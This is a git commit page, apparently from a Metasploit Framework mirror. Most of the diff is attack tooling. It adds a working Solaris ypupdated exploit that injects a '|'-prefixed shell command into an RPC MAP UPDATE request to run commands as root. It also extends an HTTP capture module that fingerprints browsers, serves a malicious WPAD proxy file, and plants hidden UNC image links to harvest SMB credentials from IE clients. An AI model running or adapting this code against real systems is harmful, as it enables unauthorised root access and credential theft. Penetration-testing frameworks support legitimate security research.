infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding I)ruids's yp exploit. Fixing a streamserver bug thats been causing problems for a while. Updating the HTTP capture module to do better fingerprinting 

git-svn-id: file:///home/svn/framework3/trunk@5477 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-04-18 01:33:09 +00:00
parent 094333edce
commit 57131f98c3
3 changed files with 157 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/rex/io/stream_server.rb
View File

@ -175,6 +175,10 @@ protected
rlog(ExceptionCallStack) rlog(ExceptionCallStack)
end end
} }
rescue ::Rex::StreamClosedError => e
# Remove the closed stream from the list
clients.delete(e.stream)
rescue rescue
elog("Error in stream server client monitor: #{$!}") elog("Error in stream server client monitor: #{$!}")
rlog(ExceptionCallStack) rlog(ExceptionCallStack)

91
modules/auxiliary/server/capture/http.rb
View File

@ -71,7 +71,9 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
def on_client_data(cli) def on_client_data(cli)
begin begin
case cli.request.parse(cli.get) data = cli.get_once(-1, 5)
case cli.request.parse(data)
when Rex::Proto::Http::Packet::ParseCode::Completed when Rex::Proto::Http::Packet::ParseCode::Completed
dispatch_request(cli, cli.request) dispatch_request(cli, cli.request)
@ -79,23 +81,62 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
when Rex::Proto::Http::Packet::ParseCode::Error when Rex::Proto::Http::Packet::ParseCode::Error
close_client(cli) close_client(cli)
end end
rescue EOFError rescue ::EOFError, ::Errno::EACCES, ::Errno::ECONNABORTED, ::Errno::ECONNRESET
if (cli.request.completed?) rescue ::Exception
dispatch_request(cli, cli.request) print_status("Error: #{$!.class} #{$!} #{$!.backtrace}")
cli.reset_cli
end
close_client(cli)
end end
close_client(cli)
end end
def close_client(cli) def close_client(cli)
cli.close
end end
def dispatch_request(cli, req) def dispatch_request(cli, req)
os_name = nil
os_type = nil
os_vers = nil
os_arch = 'x86'
ua_name = nil
ua_vers = nil
ua = req['User-Agent']
case (ua)
when /rv:([\d\.]+)/
ua_name = 'FF'
ua_vers = $1
when /Mozilla\/[0-9]\.[0-9] \(compatible; MSIE ([0-9]\.[0-9]+)/:
ua_name = 'IE'
ua_vers = $1
when /Version\/(\d+\.\d+\.\d+).*Safari/
ua_name = 'Safari'
ua_vers = $1
end
case (ua)
when /Windows/
os_name = 'Windows'
when /Linux/
os_name = 'Linux'
when /iPhone/
os_name = 'iPhone'
os_arch = 'armle'
when /Mac OS X/
os = 'Mac'
end
case (ua)
when /PPC/
os_arch = 'ppc'
end
os_name ||= 'Unknown'
mysrc = Rex::Socket.source_address(cli.peerhost) mysrc = Rex::Socket.source_address(cli.peerhost)
hhead = (req['Host'] || @myhost).split(':', 2)[0] hhead = (req['Host'] || @myhost).split(':', 2)[0]
@ -114,6 +155,21 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}") print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
end end
if(req.resource =~ /\.eml$/)
eml = "To: User\r\nFrom: Support\r\nSubject: Failed to connect\r\n\r\nInternet access has been prohibited by the administrator\r\n"
res =
"HTTP/1.1 200 OK\r\n" +
"Host: #{hhead}\r\n" +
"Content-Type: message/rfc822\r\n" +
"Content-Length: #{eml.length}\r\n" +
"Connection: Close\r\n\r\n#{eml}"
print_status("HTTP EML sent to #{cli.peerhost}")
cli.put(res)
return
end
if(req.resource =~ /^wpad.dat|.*\.pac$/i) if(req.resource =~ /^wpad.dat|.*\.pac$/i)
prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }" prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
res = res =
@ -127,7 +183,7 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
return return
end end
print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}") print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers}")
# The google maps / stocks view on the iPhone # The google maps / stocks view on the iPhone
@ -149,9 +205,7 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
end end
# Background image
# SMB MITM / RELAY
body_extra = "" body_extra = ""
if(@bgimage) if(@bgimage)
img_ext = @bgimage.split(".")[-1].downcase img_ext = @bgimage.split(".")[-1].downcase
@ -192,11 +246,18 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
end end
data = "<html><head><title>Connecting...</title></head><body>#{body_extra}"
if(ua_name == "IE")
data << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>"
end
data << "</body></html>"
data = "<html><head><title>Connecting...</title></head><body>#{body_extra}<img src='\\\\#{mysrc}\\public\\loading.jpg' width='1' height='1'></body></html>"
res = res =
"HTTP/1.1 200 OK\r\n" + "HTTP/1.1 200 OK\r\n" +
"Host: #{mysrc}\r\n" + "Host: #{mysrc}\r\n" +
"Expires: 0\r\n" +
"Cache-Control: must-revalidate\r\n" +
"Content-Type: text/html\r\n" + "Content-Type: text/html\r\n" +
"Content-Length: #{data.length}\r\n" + "Content-Length: #{data.length}\r\n" +
"Connection: Close\r\n\r\n#{data}" "Connection: Close\r\n\r\n#{data}"
@ -206,7 +267,5 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
end end
end end
end end

78
modules/exploits/solaris/sunrpc/ypupdated_exec.rb Normal file
View File

@ -0,0 +1,78 @@
require 'msf/core'
module Msf
class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote
include Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <druid@caughq.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4498 $',
'References' =>
[
['BID', '1749'],
['CVE', '1999-0209'],
['OSVDB', '11517'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status 'Sending PortMap request for ypupdated program'
pport = sunrpc_create('udp', program, progver)
print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
print_status 'Waiting for response...'
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_good 'No Errors, appears to have succeeded!'
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_status 'Warning: ' + $!
print_status 'Exploit may or may not have succeeded.'
end
end
end